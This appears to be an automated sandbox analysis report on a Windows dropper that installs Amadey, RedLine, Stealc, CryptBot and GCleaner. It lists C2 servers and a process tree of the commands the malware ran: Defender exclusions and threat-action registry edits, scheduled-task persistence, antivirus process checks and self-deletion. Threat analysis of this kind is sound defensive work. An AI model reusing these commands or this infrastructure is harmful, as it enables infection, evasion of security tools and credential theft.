Resubmissions

21-09-2024 14:25

240921-rrbywawgkg 10

19-09-2024 22:36

240919-2jae7avdmr 10

Analysis

  • max time kernel
    193s
  • max time network
    298s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:36

General

  • Target

    64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe

  • Size

    1.8MB

  • MD5

    c870d398c91b01ac088bc903e4ff7461

  • SHA1

    906013f31a6b70ec92139523d298fa7fd60854ba

  • SHA256

    64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808

  • SHA512

    4ca56a3e13f1f6be8128169b2146a134d0a5aa5d428bcee402ffffb50e95e5a1fc331a29ed15a4ca533b3b5bf60edb4b65eefbc6e51d09eb46e95a1447f3c23b

  • SSDEEP

    49152:WgrlfDqtlNlJ5u/zGOv/9wts4IWfMtNvp4sv:WI7qzQyts6MTR4

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

gcleaner

C2

80.66.75.114

45.91.200.135

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • .NET Reactor proctector 9 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1200
      • C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
        "C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2960
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1640
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:2896
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2876
            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Users\Admin\AppData\Roaming\n3WUqhzxod.exe
                "C:\Users\Admin\AppData\Roaming\n3WUqhzxod.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Users\Admin\AppData\Roaming\BUCiajAZZJ.exe
                "C:\Users\Admin\AppData\Roaming\BUCiajAZZJ.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2168
              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2452
                • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:1160
                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                    "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3836
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3780
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2016
            • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
              "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              PID:2784
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                5⤵
                • Executes dropped EXE
                PID:1996
            • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
              "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
              4⤵
              • Blocklisted process makes network request
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2328
            • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
              "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1328
              • C:\Users\Admin\AppData\Local\Temp\filename.exe
                "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:392
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                  6⤵
                    PID:1556
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "filename.exe" /f
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3312
              • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
                "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2200
              • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
                "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:392
              • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
                "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
                4⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                PID:2276
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                  5⤵
                  • Loads dropped DLL
                  PID:2228
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2892
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa opssvc"
                    6⤵
                      PID:2604
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      6⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:776
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      6⤵
                        PID:1528
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 607698
                        6⤵
                          PID:904
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V "MaskBathroomCompositionInjection" Participants
                          6⤵
                            PID:1920
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                            6⤵
                              PID:2084
                            • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                              Waters.pif Q
                              6⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:960
                            • C:\Windows\SysWOW64\choice.exe
                              choice /d y /t 5
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:2136
                        • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1580
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2368
                        • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:812
                          • C:\Users\Admin\AppData\Local\Temp\7zS1851.tmp\Install.exe
                            .\Install.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:304
                            • C:\Users\Admin\AppData\Local\Temp\7zS1C57.tmp\Install.exe
                              .\Install.exe /RNXdidDHt "385121" /S
                              6⤵
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Enumerates system info in registry
                              PID:1120
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                7⤵
                                  PID:2736
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:360
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1304
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                        10⤵
                                          PID:296
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      PID:612
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        9⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2244
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2168
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:1100
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        9⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3052
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          10⤵
                                            PID:2684
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:1328
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          9⤵
                                            PID:2812
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              10⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2896
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          8⤵
                                          • Indirect Command Execution
                                          PID:1604
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2808
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              10⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2128
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                11⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2084
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                        7⤵
                                        • Indirect Command Execution
                                        PID:1528
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          8⤵
                                            PID:1920
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2292
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                10⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2328
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\AyDjQad.exe\" PV /ZfFJdidfOGj 385121 /S" /V1 /F
                                          7⤵
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1460
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 636
                                          7⤵
                                          • Loads dropped DLL
                                          • Program crash
                                          PID:3752
                                  • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                    4⤵
                                    • Drops startup file
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Adds Run key to start application
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: AddClipboardFormatListener
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2172
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2776
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2560
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3960
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3728
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                      5⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3888
                                    • C:\Users\Admin\AppData\Local\Temp\afaubi.exe
                                      "C:\Users\Admin\AppData\Local\Temp\afaubi.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:108
                                    • C:\Users\Admin\AppData\Local\Temp\ieqfib.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ieqfib.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3548
                                    • C:\Users\Admin\AppData\Local\Temp\wletej.exe
                                      "C:\Users\Admin\AppData\Local\Temp\wletej.exe"
                                      5⤵
                                      • Blocklisted process makes network request
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:1776
                                  • C:\Users\Admin\AppData\Local\Temp\1000308001\039f281b1b.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000308001\039f281b1b.exe"
                                    4⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Blocklisted process makes network request
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Loads dropped DLL
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:872
                                  • C:\Users\Admin\AppData\Local\Temp\1000309001\77b9a6c11a.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000309001\77b9a6c11a.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:2184
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                      5⤵
                                        PID:1456
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                          6⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:1316
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.0.1788423283\2083958033" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1180 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9cd9c41-1138-4fb2-8430-ced10bae8722} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 1344 103f0158 gpu
                                            7⤵
                                              PID:2260
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.1.931919070\1481676114" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1b9be58-8467-48ad-9c40-bb7e8097af7a} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 1528 f0e2858 socket
                                              7⤵
                                                PID:1496
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.2.1585076921\230295620" -childID 1 -isForBrowser -prefsHandle 2012 -prefMapHandle 2008 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 628 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75033858-26e3-4d82-b4a7-41b0693a6f3d} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 2024 18ca5d58 tab
                                                7⤵
                                                  PID:832
